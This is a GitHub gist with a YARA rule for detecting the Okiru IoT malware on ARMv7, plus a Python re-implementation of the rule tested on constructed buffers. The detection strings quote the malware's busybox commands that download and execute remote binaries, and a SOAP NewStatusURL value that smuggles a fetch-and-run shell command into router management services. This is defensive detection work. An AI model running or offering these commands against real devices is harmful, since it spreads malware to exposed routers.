@azurda
Last active December 12, 2017 10:49
Ruleset to detect the Okiru IoT malware based on the ARMv7 version found.
rule Okiru : arm7 {
    meta:
        date = "11.12.2017"
        description = "Ruleset to detect the Okiru IoT malware based on the ARMv7 version found."
    strings:
        // printf-style command templates the sample uses to build its busybox
        // dropper / loader commands. They sit unexpanded in the binary, so the
        // %s and %d placeholders are matched literally.
        $busy_1 = "/bin/busybox cp /bin/busybox %s; /bin/busybox cp /bin/busybox %s; >%s; >%s; /bin/busybox chmod 777 %s %s"
        $busy_2 = "/bin/busybox cp /bin/busybox %s; >%s; /bin/busybox chmod 777 %s"
        $busy_3 = "/bin/busybox wget http://%d.%d.%d.%d:%d/fahwrzadws/okiru.%s -O -> %s; /bin/busybox chmod 777 %s; ./%s; >%s"
        $busy_4 = "/bin/busybox tftp -r okiru.%s -l %s -g %d.%d.%d.%d; /bin/busybox chmod 777 %s; ./%s; >%s"
        // The \x45..\x45 hex escapes decode to the marker string "ECHODONE".
        $busy_5 = "/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'"
        // Variant of $busy_5 using echo's '\c' instead of -en. Left disabled:
        // '\c' is not an escape sequence YARA accepts inside a text string,
        // so the rule would not compile with this line active as written.
        // $busy_6 = "/bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'"
        // Shell command substitution embedded in a NewStatusURL SOAP element,
        // the payload the sample uses to spread to exposed router management services.
        $xml = "<NewStatusURL>$(/bin/busybox wget -g %d.%d.%d.%d -l /tmp/.f -r /b; sh /tmp/.f)</NewStatusURL>"
    condition:
        // Require most of the dropper templates plus the spreading payload,
        // which keeps generic busybox strings alone from firing the rule.
        3 of ($busy_*) and $xml
}
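To see what the rule actually matches on, the following is an added example (not part of the gist) that re-implements its matching logic in plain Python: it decodes the YARA text-string escapes (so `\x45...` becomes `ECHODONE`), searches a constructed stand-in for a binary's string table, and applies the `3 of ($busy_*) and $xml` condition. Names such as `decode_yara_text`, `match_okiru` and the `SAMPLE_*` buffers are the example's own; only plain text strings are handled (no `wide`/`nocase` modifiers).

```python
"""Plain-Python re-implementation of the Okiru rule's matching semantics.

Added example, not the gist's own code. Useful for understanding the rule
or checking it in an environment without yara-python installed.
"""
import re

# String literals copied from the rule above, still in YARA literal form.
RULE_STRINGS = {
    "$busy_1": r"/bin/busybox cp /bin/busybox %s; /bin/busybox cp /bin/busybox %s; >%s; >%s; /bin/busybox chmod 777 %s %s",
    "$busy_2": r"/bin/busybox cp /bin/busybox %s; >%s; /bin/busybox chmod 777 %s",
    "$busy_3": r"/bin/busybox wget http://%d.%d.%d.%d:%d/fahwrzadws/okiru.%s -O -> %s; /bin/busybox chmod 777 %s; ./%s; >%s",
    "$busy_4": r"/bin/busybox tftp -r okiru.%s -l %s -g %d.%d.%d.%d; /bin/busybox chmod 777 %s; ./%s; >%s",
    "$busy_5": r"/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'",
    "$xml": r"<NewStatusURL>$(/bin/busybox wget -g %d.%d.%d.%d -l /tmp/.f -r /b; sh /tmp/.f)</NewStatusURL>",
}

# Escapes YARA accepts in a text string: \xNN, \n, \t, \" and \\ .
_ESCAPE = re.compile(r'\\(x[0-9A-Fa-f]{2}|[nt"\\])')
_SIMPLE = {"n": b"\n", "t": b"\t", '"': b'"', "\\": b"\\"}


def decode_yara_text(literal: str) -> bytes:
    """Turn a YARA text-string literal into the raw bytes YARA searches for."""
    out = bytearray()
    pos = 0
    for m in _ESCAPE.finditer(literal):
        out += literal[pos:m.start()].encode("latin-1")
        esc = m.group(1)
        out += bytes([int(esc[1:], 16)]) if esc[0] == "x" else _SIMPLE[esc]
        pos = m.end()
    out += literal[pos:].encode("latin-1")
    return bytes(out)


def match_okiru(data: bytes):
    """Apply the rule to a buffer.

    Returns (rule_matched, [identifiers that matched]) with the same
    condition as the rule: at least three $busy_* strings and $xml.
    """
    matched = [ident for ident, lit in RULE_STRINGS.items()
               if decode_yara_text(lit) in data]
    busy_hits = sum(1 for ident in matched if ident.startswith("$busy_"))
    return busy_hits >= 3 and "$xml" in matched, matched


# Constructed stand-in for an unpacked sample's .rodata (not a real binary).
# The templates sit there unexpanded, which is why "%s"/"%d" match literally,
# and the hex-escaped marker appears as plain "ECHODONE".
SAMPLE_POSITIVE = (
    b"\x00" * 16
    + b"/bin/busybox cp /bin/busybox %s; >%s; /bin/busybox chmod 777 %s\x00"
    + b"/bin/busybox wget http://%d.%d.%d.%d:%d/fahwrzadws/okiru.%s -O -> %s; /bin/busybox chmod 777 %s; ./%s; >%s\x00"
    + b"/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en 'ECHODONE'\x00"
    + b"<NewStatusURL>$(/bin/busybox wget -g %d.%d.%d.%d -l /tmp/.f -r /b; sh /tmp/.f)</NewStatusURL>\x00"
)

# Constructed buffer with the spreading payload but only two dropper
# templates: below the "3 of" threshold, so the rule must not fire.
SAMPLE_NEGATIVE = (
    b"/bin/busybox cp /bin/busybox %s; >%s; /bin/busybox chmod 777 %s\x00"
    + b"/bin/busybox wget http://%d.%d.%d.%d:%d/fahwrzadws/okiru.%s -O -> %s; /bin/busybox chmod 777 %s; ./%s; >%s\x00"
    + b"<NewStatusURL>$(/bin/busybox wget -g %d.%d.%d.%d -l /tmp/.f -r /b; sh /tmp/.f)</NewStatusURL>\x00"
)

if __name__ == "__main__":
    print("decoded $busy_5 tail:", decode_yara_text(RULE_STRINGS["$busy_5"])[-10:])
    print("positive sample:", match_okiru(SAMPLE_POSITIVE))
    print("negative sample:", match_okiru(SAMPLE_NEGATIVE))
```

With yara-python available the same check is simply `yara.compile(source=rule_text).match(data=SAMPLE_POSITIVE)`; the re-implementation exists only to make the escape decoding and the `3 of` threshold visible.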